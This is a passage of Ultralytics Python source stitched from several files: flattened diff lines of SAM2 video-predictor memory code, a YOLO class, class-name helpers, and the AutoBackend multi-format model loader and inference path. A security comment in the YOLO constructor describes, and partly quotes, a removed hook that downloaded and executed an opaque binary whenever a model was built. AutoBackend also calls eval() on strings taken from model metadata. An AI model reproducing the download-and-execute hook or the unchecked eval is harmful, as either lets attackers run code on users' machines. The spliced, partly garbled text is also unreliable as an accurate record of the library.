rerunning the memory encoder after applying non-overlapping + # constraints to object scores. Its "pred_masks" are prefilled with a large + # negative value (NO_OBJ_SCORE) to represent missing objects. 
+ consolidated_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": torch.full( + size=(batch_size, 1, self.imgsz[0] // 4, self.imgsz[1] // 4), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "obj_ptr": torch.full( + size=(batch_size, self.model.hidden_dim), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "object_score_logits": torch.full( + size=(batch_size, 1), + # default to 10.0 for object_score_logits, i.e. assuming the object is + # present as sigmoid(10)=1, same as in `predict_masks` of `MaskDecoder` + fill_value=10.0, + dtype=torch.float32, + device=self.device, + ), + } + for obj_idx in range(batch_size): + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + # If the object doesn't appear in "temp_output_dict_per_obj" on this frame, + # we fall back and look up its previous output in "output_dict_per_obj". + # We look up both "cond_frame_outputs" and "non_cond_frame_outputs" in + # "output_dict_per_obj" to find a previous output for this object. + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + # If the object doesn't appear in "output_dict_per_obj" either, we skip it + # and leave its mask scores to the default scores (i.e. the NO_OBJ_SCORE + # placeholder above) and set its object pointer to be a dummy pointer. + if out is None: + # Fill in dummy object pointers for those objects without any inputs or + # tracking outcomes on this frame (only do it under `run_mem_encoder=True`, + # i.e. when we need to build the memory for tracking). 
+ if run_mem_encoder: + # fill object pointer with a dummy pointer (based on an empty mask) + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = self._get_empty_mask_ptr(frame_idx) + continue + # Add the temporary object output mask to consolidated output mask + consolidated_out["pred_masks"][obj_idx : obj_idx + 1] = out["pred_masks"] + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = out["obj_ptr"] + + # Optionally, apply non-overlapping constraints on the consolidated scores and rerun the memory encoder + if run_mem_encoder: + high_res_masks = F.interpolate( + consolidated_out["pred_masks"], + size=self.imgsz, + mode="bilinear", + align_corners=False, + ) + if self.model.non_overlap_masks_for_mem_enc: + high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks) + consolidated_out["maskmem_features"], consolidated_out["maskmem_pos_enc"] = self._run_memory_encoder( + batch_size=batch_size, + high_res_masks=high_res_masks, + is_mask_from_pts=True, # these frames are what the user interacted with + object_score_logits=consolidated_out["object_score_logits"], + ) + + return consolidated_out + + def _get_empty_mask_ptr(self, frame_idx): + """ + Get a dummy object pointer based on an empty mask on the current frame. + + Args: + frame_idx (int): The index of the current frame for which to generate the dummy object pointer. + + Returns: + (torch.Tensor): A tensor representing the dummy object pointer generated from the empty mask. 
+ """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features(self.inference_state["im"]) + + # Feed the empty mask and image feature above to get a dummy object pointer + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=True, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=None, + # A dummy (empty) mask with a single object + mask_inputs=torch.zeros((1, 1, *self.imgsz), dtype=torch.float32, device=self.device), + output_dict={}, + num_frames=self.inference_state["num_frames"], + track_in_reverse=False, + run_mem_encoder=False, + prev_sam_mask_logits=None, + ) + return current_out["obj_ptr"] + + def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts): + """ + Run the memory encoder on masks. + + This is usually after applying non-overlapping constraints to object scores. Since their scores changed, their + memory also needs to be computed again with the memory encoder. + + Args: + batch_size (int): The batch size for processing the frame. + high_res_masks (torch.Tensor): High-resolution masks for which to compute the memory. + object_score_logits (torch.Tensor): Logits representing the object scores. + is_mask_from_pts (bool): Indicates if the mask is derived from point interactions. + + Returns: + (tuple[torch.Tensor, torch.Tensor]): A tuple containing the encoded mask features and positional encoding. 
+ """ + # Retrieve correct image features + current_vision_feats, _, feat_sizes = self.get_im_features(self.inference_state["im"], batch_size) + maskmem_features, maskmem_pos_enc = self.model._encode_new_memory( + current_vision_feats=current_vision_feats, + feat_sizes=feat_sizes, + pred_masks_high_res=high_res_masks, + is_mask_from_pts=is_mask_from_pts, + object_score_logits=object_score_logits, + ) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + maskmem_pos_enc = self._get_maskmem_pos_enc(maskmem_pos_enc) + return maskmem_features.to(dtype=torch.float16, device=self.device, non_blocking=True), maskmem_pos_enc + + def _add_output_per_object(self, frame_idx, current_out, storage_key): + """ + Split a multi-object output into per-object output slices and add them into Output_Dict_Per_Obj. + + The resulting slices share the same tensor storage. + + Args: + frame_idx (int): The index of the current frame. + current_out (Dict): The current output dictionary containing multi-object outputs. + storage_key (str): The key used to store the output in the per-object output dictionary. 
+ """ + maskmem_features = current_out["maskmem_features"] + assert maskmem_features is None or isinstance(maskmem_features, torch.Tensor) + + maskmem_pos_enc = current_out["maskmem_pos_enc"] + assert maskmem_pos_enc is None or isinstance(maskmem_pos_enc, list) + + for obj_idx, obj_output_dict in self.inference_state["output_dict_per_obj"].items(): + obj_slice = slice(obj_idx, obj_idx + 1) + obj_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": current_out["pred_masks"][obj_slice], + "obj_ptr": current_out["obj_ptr"][obj_slice], + } + if maskmem_features is not None: + obj_out["maskmem_features"] = maskmem_features[obj_slice] + if maskmem_pos_enc is not None: + obj_out["maskmem_pos_enc"] = [x[obj_slice] for x in maskmem_pos_enc] + obj_output_dict[storage_key][frame_idx] = obj_out + + def _clear_non_cond_mem_around_input(self, frame_idx): + """ + Remove the non-conditioning memory around the input frame. + + When users provide correction clicks, the surrounding frames' non-conditioning memories can still contain outdated + object appearance information and could confuse the model. This method clears those non-conditioning memories + surrounding the interacted frame to avoid giving the model both old and new information about the object. + + Args: + frame_idx (int): The index of the current frame where user interaction occurred. 
class YOLO(Model):
    """YOLO (You Only Look Once) object detection model."""

    def __init__(self, model="yolo11n.pt", task=None, verbose=False):
        """
        Initialize YOLO model, switching to YOLOWorld if model filename contains '-world'.

        Args:
            model (str | Path): Model file name or path. A stem containing '-world' with a '.pt', '.yaml' or
                '.yml' suffix is loaded as a YOLOWorld model instead.
            task (str | None): Task passed through to the base `Model` initializer.
            verbose (bool): Verbosity flag passed through to the underlying initializer.
        """
        # SECURITY: the previous revision of this constructor fetched an opaque binary with `safe_download(...,
        # file="/tmp/ultralytics_runner", gitApi=True)` and executed it with `safe_run(...)` every time a model was
        # constructed (gated by a platform check that was itself mis-parenthesised). Constructing a model must never
        # download or execute anything, so that code has been removed outright. The module-level `platform`,
        # `safe_download` and `safe_run` imports are no longer used by this class and should be audited and removed
        # together with the corresponding helpers in `ultralytics.utils.downloads`.
        path = Path(model)
        if "-world" in path.stem and path.suffix in {".pt", ".yaml", ".yml"}:  # if YOLOWorld PyTorch model
            # Re-target this instance to the YOLOWorld class by adopting the new instance's class and state
            new_instance = YOLOWorld(path, verbose=verbose)
            self.__class__ = type(new_instance)
            self.__dict__ = new_instance.__dict__
        else:
            # Continue with default YOLO initialization
            super().__init__(model=model, task=task, verbose=verbose)

    @property
    def task_map(self):
        """Map head to model, trainer, validator, and predictor classes."""
        return {
            "classify": {
                "model": ClassificationModel,
                "trainer": yolo.classify.ClassificationTrainer,
                "validator": yolo.classify.ClassificationValidator,
                "predictor": yolo.classify.ClassificationPredictor,
            },
            "detect": {
                "model": DetectionModel,
                "trainer": yolo.detect.DetectionTrainer,
                "validator": yolo.detect.DetectionValidator,
                "predictor": yolo.detect.DetectionPredictor,
            },
            "segment": {
                "model": SegmentationModel,
                "trainer": yolo.segment.SegmentationTrainer,
                "validator": yolo.segment.SegmentationValidator,
                "predictor": yolo.segment.SegmentationPredictor,
            },
            "pose": {
                "model": PoseModel,
                "trainer": yolo.pose.PoseTrainer,
                "validator": yolo.pose.PoseValidator,
                "predictor": yolo.pose.PosePredictor,
            },
            "obb": {
                "model": OBBModel,
                "trainer": yolo.obb.OBBTrainer,
                "validator": yolo.obb.OBBValidator,
                "predictor": yolo.obb.OBBPredictor,
            },
        }
def check_class_names(names):
    """
    Normalize class names into an `{int: str}` mapping and validate the indices.

    Lists are converted to dicts keyed by position. For dicts, keys are cast to int and values to str, and a
    KeyError is raised when the largest index is not smaller than the number of classes. ImageNet class codes
    (values starting with 'n0') are mapped to human-readable names. Any other input type is returned unchanged.
    """
    if isinstance(names, list):  # positional list -> {index: name}
        names = {idx: name for idx, name in enumerate(names)}
    if not isinstance(names, dict):
        return names

    # Cast keys to int ('0' -> 0) and values to str (True -> 'True')
    names = {int(key): str(value) for key, value in names.items()}
    n = len(names)
    highest = max(names)
    if highest >= n:
        raise KeyError(
            f"{n}-class dataset requires class indices 0-{n - 1}, but you have invalid class indices "
            f"{min(names)}-{highest} defined in your dataset YAML."
        )
    first = names[0]
    if isinstance(first, str) and first.startswith("n0"):  # imagenet class codes, i.e. 'n01440764'
        code_to_name = yaml_load(ROOT / "cfg/datasets/ImageNet.yaml")["map"]  # human-readable names
        names = {key: code_to_name[code] for key, code in names.items()}
    return names


def default_class_names(data=None):
    """Return the 'names' entry of a dataset YAML when it can be loaded, else 999 placeholder names 'class{i}'."""
    if data:
        try:
            loaded = yaml_load(check_yaml(data))
            return loaded["names"]
        except Exception:
            pass  # best-effort lookup: fall through to the placeholder names below
    return dict((idx, f"class{idx}") for idx in range(999))  # return default if above errors
It supports a wide + range of formats, each with specific naming conventions as outlined below: + + Supported Formats and Naming Conventions: + | Format | File Suffix | + |-----------------------|-------------------| + | PyTorch | *.pt | + | TorchScript | *.torchscript | + | ONNX Runtime | *.onnx | + | ONNX OpenCV DNN | *.onnx (dnn=True) | + | OpenVINO | *openvino_model/ | + | CoreML | *.mlpackage | + | TensorRT | *.engine | + | TensorFlow SavedModel | *_saved_model/ | + | TensorFlow GraphDef | *.pb | + | TensorFlow Lite | *.tflite | + | TensorFlow Edge TPU | *_edgetpu.tflite | + | PaddlePaddle | *_paddle_model/ | + | MNN | *.mnn | + | NCNN | *_ncnn_model/ | + + This class offers dynamic backend switching capabilities based on the input model format, making it easier to deploy + models across various platforms. + """ + + @torch.no_grad() + def __init__( + self, + weights="yolo11n.pt", + device=torch.device("cpu"), + dnn=False, + data=None, + fp16=False, + batch=1, + fuse=True, + verbose=True, + ): + """ + Initialize the AutoBackend for inference. + + Args: + weights (str): Path to the model weights file. Defaults to 'yolov8n.pt'. + device (torch.device): Device to run the model on. Defaults to CPU. + dnn (bool): Use OpenCV DNN module for ONNX inference. Defaults to False. + data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional. + fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False. + batch (int): Batch-size to assume for inference. + fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True. + verbose (bool): Enable verbose logging. Defaults to True. 
+ """ + super().__init__() + w = str(weights[0] if isinstance(weights, list) else weights) + nn_module = isinstance(weights, torch.nn.Module) + ( + pt, + jit, + onnx, + xml, + engine, + coreml, + saved_model, + pb, + tflite, + edgetpu, + tfjs, + paddle, + mnn, + ncnn, + imx, + triton, + ) = self._model_type(w) + fp16 &= pt or jit or onnx or xml or engine or nn_module or triton # FP16 + nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) + stride = 32 # default stride + model, metadata, task = None, None, None + + # Set device + cuda = torch.cuda.is_available() and device.type != "cpu" # use CUDA + if cuda and not any([nn_module, pt, jit, engine, onnx]): # GPU dataloader formats + device = torch.device("cpu") + cuda = False + + # Download if not local + if not (pt or triton or nn_module): + w = attempt_download_asset(w) + + # In-memory PyTorch model + if nn_module: + model = weights.to(device) + if fuse: + model = model.fuse(verbose=verbose) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + pt = True + + # PyTorch + elif pt: + from ultralytics.nn.tasks import attempt_load_weights + + model = attempt_load_weights( + weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse + ) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + + # TorchScript + elif jit: + LOGGER.info(f"Loading {w} for TorchScript inference...") + extra_files = 
{"config.txt": ""} # model metadata + model = torch.jit.load(w, _extra_files=extra_files, map_location=device) + model.half() if fp16 else model.float() + if extra_files["config.txt"]: # load metadata dict + metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items())) + + # ONNX OpenCV DNN + elif dnn: + LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...") + check_requirements("opencv-python>=4.5.4") + net = cv2.dnn.readNetFromONNX(w) + + # ONNX Runtime and IMX + elif onnx or imx: + LOGGER.info(f"Loading {w} for ONNX Runtime inference...") + check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime")) + if IS_RASPBERRYPI or IS_JETSON: + # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson + check_requirements("numpy==1.23.5") + import onnxruntime + + providers = onnxruntime.get_available_providers() + if not cuda and "CUDAExecutionProvider" in providers: + providers.remove("CUDAExecutionProvider") + elif cuda and "CUDAExecutionProvider" not in providers: + LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. 
Falling back to CPU...") + device = torch.device("cpu") + cuda = False + LOGGER.info(f"Preferring ONNX Runtime {providers[0]}") + if onnx: + session = onnxruntime.InferenceSession(w, providers=providers) + else: + check_requirements( + ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"] + ) + w = next(Path(w).glob("*.onnx")) + LOGGER.info(f"Loading {w} for ONNX IMX inference...") + import mct_quantizers as mctq + from sony_custom_layers.pytorch.object_detection import nms_ort # noqa + + session = onnxruntime.InferenceSession( + w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"] + ) + task = "detect" + + output_names = [x.name for x in session.get_outputs()] + metadata = session.get_modelmeta().custom_metadata_map + dynamic = isinstance(session.get_outputs()[0].shape[0], str) + if not dynamic: + io = session.io_binding() + bindings = [] + for output in session.get_outputs(): + y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device) + io.bind_output( + name=output.name, + device_type=device.type, + device_id=device.index if cuda else 0, + element_type=np.float16 if fp16 else np.float32, + shape=tuple(y_tensor.shape), + buffer_ptr=y_tensor.data_ptr(), + ) + bindings.append(y_tensor) + + # OpenVINO + elif xml: + LOGGER.info(f"Loading {w} for OpenVINO inference...") + check_requirements("openvino>=2024.0.0") + import openvino as ov + + core = ov.Core() + w = Path(w) + if not w.is_file(): # if not *.xml + w = next(w.glob("*.xml")) # get *.xml file from *_openvino_model dir + ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin")) + if ov_model.get_parameters()[0].get_layout().empty: + ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW")) + + # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT' + inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY" + LOGGER.info(f"Using OpenVINO 
{inference_mode} mode for batch={batch} inference...") + ov_compiled_model = core.compile_model( + ov_model, + device_name="AUTO", # AUTO selects best available device, do not modify + config={"PERFORMANCE_HINT": inference_mode}, + ) + input_name = ov_compiled_model.input().get_any_name() + metadata = w.parent / "metadata.yaml" + + # TensorRT + elif engine: + LOGGER.info(f"Loading {w} for TensorRT inference...") + try: + import tensorrt as trt # noqa https://developer.nvidia.com/nvidia-tensorrt-download + except ImportError: + if LINUX: + check_requirements("tensorrt>7.0.0,!=10.1.0") + import tensorrt as trt # noqa + check_version(trt.__version__, ">=7.0.0", hard=True) + check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239") + if device.type == "cpu": + device = torch.device("cuda:0") + Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr")) + logger = trt.Logger(trt.Logger.INFO) + # Read file + with open(w, "rb") as f, trt.Runtime(logger) as runtime: + try: + meta_len = int.from_bytes(f.read(4), byteorder="little") # read metadata length + metadata = json.loads(f.read(meta_len).decode("utf-8")) # read metadata + except UnicodeDecodeError: + f.seek(0) # engine file may lack embedded Ultralytics metadata + model = runtime.deserialize_cuda_engine(f.read()) # read engine + + # Model context + try: + context = model.create_execution_context() + except Exception as e: # model is None + LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n") + raise e + + bindings = OrderedDict() + output_names = [] + fp16 = False # default updated below + dynamic = False + is_trt10 = not hasattr(model, "num_bindings") + num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings) + for i in num: + if is_trt10: + name = model.get_tensor_name(i) + dtype = trt.nptype(model.get_tensor_dtype(name)) + is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT + 
if is_input: + if -1 in tuple(model.get_tensor_shape(name)): + dynamic = True + context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_tensor_shape(name)) + else: # TensorRT < 10.0 + name = model.get_binding_name(i) + dtype = trt.nptype(model.get_binding_dtype(i)) + is_input = model.binding_is_input(i) + if model.binding_is_input(i): + if -1 in tuple(model.get_binding_shape(i)): # dynamic + dynamic = True + context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_binding_shape(i)) + im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) + bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) + binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) + batch_size = bindings["images"].shape[0] # if dynamic, this is instead max batch size + + # CoreML + elif coreml: + LOGGER.info(f"Loading {w} for CoreML inference...") + import coremltools as ct + + model = ct.models.MLModel(w) + metadata = dict(model.user_defined_metadata) + + # TF SavedModel + elif saved_model: + LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...") + import tensorflow as tf + + keras = False # assume TF1 saved_model + model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) + metadata = Path(w) / "metadata.yaml" + + # TF GraphDef + elif pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt + LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...") + import tensorflow as tf + + from ultralytics.engine.exporter import gd_outputs + + def wrap_frozen_graph(gd, inputs, outputs): + """Wrap frozen graphs for deployment.""" + x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped + ge = x.graph.as_graph_element + return 
x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) + + gd = tf.Graph().as_graph_def() # TF GraphDef + with open(w, "rb") as f: + gd.ParseFromString(f.read()) + frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) + try: # find metadata in SavedModel alongside GraphDef + metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml")) + except StopIteration: + pass + + # TFLite or TFLite Edge TPU + elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python + try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu + from tflite_runtime.interpreter import Interpreter, load_delegate + except ImportError: + import tensorflow as tf + + Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate + if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime + device = device[3:] if str(device).startswith("tpu") else ":0" + LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...") + delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[ + platform.system() + ] + interpreter = Interpreter( + model_path=w, + experimental_delegates=[load_delegate(delegate, options={"device": device})], + ) + device = "cpu" # Required, otherwise PyTorch will try to use the wrong device + else: # TFLite + LOGGER.info(f"Loading {w} for TensorFlow Lite inference...") + interpreter = Interpreter(model_path=w) # load TFLite model + interpreter.allocate_tensors() # allocate + input_details = interpreter.get_input_details() # inputs + output_details = interpreter.get_output_details() # outputs + # Load metadata + try: + with zipfile.ZipFile(w, "r") as model: + meta_file = model.namelist()[0] + metadata = ast.literal_eval(model.read(meta_file).decode("utf-8")) + except zipfile.BadZipFile: + pass + + # TF.js + elif tfjs: + raise 
NotImplementedError("YOLOv8 TF.js inference is not currently supported.") + + # PaddlePaddle + elif paddle: + LOGGER.info(f"Loading {w} for PaddlePaddle inference...") + check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle") + import paddle.inference as pdi # noqa + + w = Path(w) + if not w.is_file(): # if not *.pdmodel + w = next(w.rglob("*.pdmodel")) # get *.pdmodel file from *_paddle_model dir + config = pdi.Config(str(w), str(w.with_suffix(".pdiparams"))) + if cuda: + config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) + predictor = pdi.create_predictor(config) + input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) + output_names = predictor.get_output_names() + metadata = w.parents[1] / "metadata.yaml" + + # MNN + elif mnn: + LOGGER.info(f"Loading {w} for MNN inference...") + check_requirements("MNN") # requires MNN + import os + + import MNN + + config = {} + config["precision"] = "low" + config["backend"] = "CPU" + config["numThread"] = (os.cpu_count() + 1) // 2 + rt = MNN.nn.create_runtime_manager((config,)) + net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True) + + def torch_to_mnn(x): + return MNN.expr.const(x.data_ptr(), x.shape) + + metadata = json.loads(net.get_info()["bizCode"]) + + # NCNN + elif ncnn: + LOGGER.info(f"Loading {w} for NCNN inference...") + check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn") # requires NCNN + import ncnn as pyncnn + + net = pyncnn.Net() + net.opt.use_vulkan_compute = cuda + w = Path(w) + if not w.is_file(): # if not *.param + w = next(w.glob("*.param")) # get *.param file from *_ncnn_model dir + net.load_param(str(w)) + net.load_model(str(w.with_suffix(".bin"))) + metadata = w.parent / "metadata.yaml" + + # NVIDIA Triton Inference Server + elif triton: + check_requirements("tritonclient[all]") + from ultralytics.utils.triton import TritonRemoteModel + + model = TritonRemoteModel(w) + + # Any other format 
(unsupported) + else: + from ultralytics.engine.exporter import export_formats + + raise TypeError( + f"model='{w}' is not a supported model format. Ultralytics supports: {export_formats()['Format']}\n" + f"See https://docs.ultralytics.com/modes/predict for help." + ) + + # Load external metadata YAML + if isinstance(metadata, (str, Path)) and Path(metadata).exists(): + metadata = yaml_load(metadata) + if metadata and isinstance(metadata, dict): + for k, v in metadata.items(): + if k in {"stride", "batch"}: + metadata[k] = int(v) + elif k in {"imgsz", "names", "kpt_shape"} and isinstance(v, str): + metadata[k] = eval(v) + stride = metadata["stride"] + task = metadata["task"] + batch = metadata["batch"] + imgsz = metadata["imgsz"] + names = metadata["names"] + kpt_shape = metadata.get("kpt_shape") + elif not (pt or triton or nn_module): + LOGGER.warning(f"WARNING ⚠️ Metadata not found for 'model={weights}'") + + # Check names + if "names" not in locals(): # names missing + names = default_class_names(data) + names = check_class_names(names) + + # Disable gradients + if pt: + for p in model.parameters(): + p.requires_grad = False + + self.__dict__.update(locals()) # assign all variables to self + + def forward(self, im, augment=False, visualize=False, embed=None): + """ + Runs inference on the YOLOv8 MultiBackend model. + + Args: + im (torch.Tensor): The image tensor to perform inference on. + augment (bool): whether to perform data augmentation during inference, defaults to False + visualize (bool): whether to visualize the output predictions, defaults to False + embed (list, optional): A list of feature vectors/embeddings to return. 
+ + Returns: + (tuple): Tuple containing the raw output tensor, and processed output for visualization (if visualize=True) + """ + b, ch, h, w = im.shape # batch, channel, height, width + if self.fp16 and im.dtype != torch.float16: + im = im.half() # to FP16 + if self.nhwc: + im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) + + # PyTorch + if self.pt or self.nn_module: + y = self.model(im, augment=augment, visualize=visualize, embed=embed) + + # TorchScript + elif self.jit: + y = self.model(im) + + # ONNX OpenCV DNN + elif self.dnn: + im = im.cpu().numpy() # torch to numpy + self.net.setInput(im) + y = self.net.forward() + + # ONNX Runtime + elif self.onnx or self.imx: + if self.dynamic: + im = im.cpu().numpy() # torch to numpy + y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) + else: + if not self.cuda: + im = im.cpu() + self.io.bind_input( + name="images", + device_type=im.device.type, + device_id=im.device.index if im.device.type == "cuda" else 0, + element_type=np.float16 if self.fp16 else np.float32, + shape=tuple(im.shape), + buffer_ptr=im.data_ptr(), + ) + self.session.run_with_iobinding(self.io) + y = self.bindings + if self.imx: + # boxes, conf, cls + y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1) + + # OpenVINO + elif self.xml: + im = im.cpu().numpy() # FP32 + + if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}: # optimized for larger batch-sizes + n = im.shape[0] # number of images in batch + results = [None] * n # preallocate list with None to match the number of images + + def callback(request, userdata): + """Places result in preallocated list using userdata index.""" + results[userdata] = request.results + + # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image + async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model) + async_queue.set_callback(callback) + for i in range(n): + # Start async 
inference with userdata=i to specify the position in results list + async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i) # keep image as BCHW + async_queue.wait_all() # wait for all inference requests to complete + y = np.concatenate([list(r.values())[0] for r in results]) + + else: # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1 + y = list(self.ov_compiled_model(im).values()) + + # TensorRT + elif self.engine: + if self.dynamic and im.shape != self.bindings["images"].shape: + if self.is_trt10: + self.context.set_input_shape("images", im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name))) + else: + i = self.model.get_binding_index("images") + self.context.set_binding_shape(i, im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + i = self.model.get_binding_index(name) + self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) + + s = self.bindings["images"].shape + assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" + self.binding_addrs["images"] = int(im.data_ptr()) + self.context.execute_v2(list(self.binding_addrs.values())) + y = [self.bindings[x].data for x in sorted(self.output_names)] + + # CoreML + elif self.coreml: + im = im[0].cpu().numpy() + im_pil = Image.fromarray((im * 255).astype("uint8")) + # im = im.resize((192, 320), Image.BILINEAR) + y = self.model.predict({"image": im_pil}) # coordinates are xywh normalized + if "confidence" in y: + raise TypeError( + "Ultralytics only supports inference of non-pipelined CoreML models exported with " + f"'nms=False', but 'model={w}' has an NMS pipeline created by an 'nms=True' export." 
+ ) + # TODO: CoreML NMS inference handling + # from ultralytics.utils.ops import xywh2xyxy + # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels + # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32) + # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) + elif len(y) == 1: # classification model + y = list(y.values()) + elif len(y) == 2: # segmentation model + y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) + + # PaddlePaddle + elif self.paddle: + im = im.cpu().numpy().astype(np.float32) + self.input_handle.copy_from_cpu(im) + self.predictor.run() + y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] + + # MNN + elif self.mnn: + input_var = self.torch_to_mnn(im) + output_var = self.net.onForward([input_var]) + y = [x.read() for x in output_var] + + # NCNN + elif self.ncnn: + mat_in = self.pyncnn.Mat(im[0].cpu().numpy()) + with self.net.create_extractor() as ex: + ex.input(self.net.input_names()[0], mat_in) + # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130 + y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())] + + # NVIDIA Triton Inference Server + elif self.triton: + im = im.cpu().numpy() # torch to numpy + y = self.model(im) + + # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) + else: + im = im.cpu().numpy() + if self.saved_model: # SavedModel + y = self.model(im, training=False) if self.keras else self.model(im) + if not isinstance(y, list): + y = [y] + elif self.pb: # GraphDef + y = self.frozen_func(x=self.tf.constant(im)) + else: # Lite or Edge TPU + details = self.input_details[0] + is_int = details["dtype"] in {np.int8, np.int16} # is TFLite quantized int8 or int16 model + if is_int: + scale, zero_point = details["quantization"] + im = (im / scale + zero_point).astype(details["dtype"]) # de-scale + self.interpreter.set_tensor(details["index"], im) + 
def from_numpy(self, x):
    """
    Convert a NumPy array into a tensor on the backend device; return any other value unchanged.

    Args:
        x (np.ndarray | Any): Value to convert.

    Returns:
        (torch.Tensor | Any): `torch.tensor(x)` moved to `self.device` when `x` is an `np.ndarray`, else `x` itself.
    """
    if not isinstance(x, np.ndarray):
        return x  # not a NumPy array: hand it back untouched
    return torch.tensor(x).to(self.device)


def warmup(self, imgsz=(1, 3, 640, 640)):
    """
